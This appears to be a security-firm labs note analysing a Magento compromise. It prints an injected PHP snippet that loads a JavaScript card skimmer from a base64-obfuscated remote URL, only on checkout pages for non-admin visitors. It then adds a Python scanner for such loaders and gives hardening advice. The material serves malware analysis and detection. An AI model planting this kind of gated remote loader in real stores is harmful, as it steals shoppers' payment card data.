Labs Note

Magento PHP Injection Loads JavaScript Skimmer

January 21, 2021, by Luke Leal


A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php

...
if ($_SERVER["REQUEST_METHOD"] === "GET"){
    if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
        if(!isset($_COOKIE["adminhtml"])){
            echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
        }
    }
}

To make it more difficult to detect, the JavaScript skimmer is fetched with the PHP function file_get_contents, and its URL is obfuscated with base64.

As an additional layer of evasive maneuvering, the skimmer only loads when two conditions are met: if the visitor is on the checkout page and if the visitor is not logged into the Magento website as an admin user.

The PHP code checks for these conditions by looking in the visitor’s requested URI for the text string “/onestepcheckout/index/” with strpos. It also checks whether the visitor has an adminhtml cookie, which would indicate that the visitor is logged into the Magento website as an admin user.
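The gating logic above is what a file scanner should look for. The following is an added example (not code from the post or from Sucuri's tools): it decodes any base64 literal passed to base64_decode, flags those that decode to a URL and sit on a line with a remote loader such as file_get_contents, and notes whether the file also contains the checkout-URI and adminhtml-cookie checks. The sample input is the injected block from the post, embedded as a constructed string.

```python
import base64
import binascii
import re

# Constructed sample: the injected block quoted in the post, same base64 literal.
SAMPLE_PHP = r'''<?php
if ($_SERVER["REQUEST_METHOD"] === "GET"){
    if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
        if(!isset($_COOKIE["adminhtml"])){
            echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
        }
    }
}
'''

# base64_decode("...") / base64_decode('...') with a quoted literal argument.
B64_CALL = re.compile(r'base64_decode\s*\(\s*([\'"])([A-Za-z0-9+/=\s]+)\1\s*\)')
# Functions that would fetch whatever the literal decodes to.
LOADERS = ("file_get_contents", "curl_exec", "fopen")
URL_RE = re.compile(r'^https?://', re.IGNORECASE)


def decode_literal(b64: str):
    """Return the decoded bytes of a base64 literal, or None if it is not valid base64."""
    try:
        return base64.b64decode(re.sub(r'\s+', '', b64), validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_php(src: str) -> list:
    """List base64 literals in PHP source, with the decoded value, whether it is a
    URL, whether a remote loader is on the same line, and whether the file also
    carries the checkout-URI / admin-cookie gating described in the post."""
    findings = []
    gated = ("/onestepcheckout/" in src) and (
        '$_COOKIE["adminhtml"]' in src or "$_COOKIE['adminhtml']" in src)
    for m in B64_CALL.finditer(src):
        raw = decode_literal(m.group(2))
        if raw is None:
            continue  # not base64 after all; nothing to report
        decoded = raw.decode("utf-8", errors="replace")
        line_start = src.rfind("\n", 0, m.start()) + 1
        line_end = src.find("\n", m.end())
        line = src[line_start:line_end if line_end != -1 else len(src)]
        findings.append({
            "line_no": src.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "is_url": bool(URL_RE.match(decoded)),
            "remote_loader": any(fn in line for fn in LOADERS),
            "gated_on_checkout_and_admin_cookie": gated,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print(finding)
```

Run it over app/code and any custom module directories; a URL decoded from a literal on a file_get_contents line in a core Magento file is worth a manual review regardless of the gating checks.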

Magento PHP Injection

Credit card skimmers are an ongoing issue for ecommerce websites. Not only do they have serious implications for your websites, but they also put customers at risk of identity theft or credit card fraud — which can ultimately lead to PCI compliance issues.

And while bad actors are constantly updating their malware with new techniques and evasive maneuvers, there are a number of steps ecommerce sites can take to protect their users and revenue streams.

To mitigate risk and prevent infection, install the latest security patches as soon as they become available, follow website hardening guidelines, and leverage a web application firewall to virtually patch any known vulnerabilities.


Categories: Ecommerce Security, Sucuri, Sucuri Labs, Website Security. Tags: Black Hat Tactics, Labs Note, Malware, Obfuscation.

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.
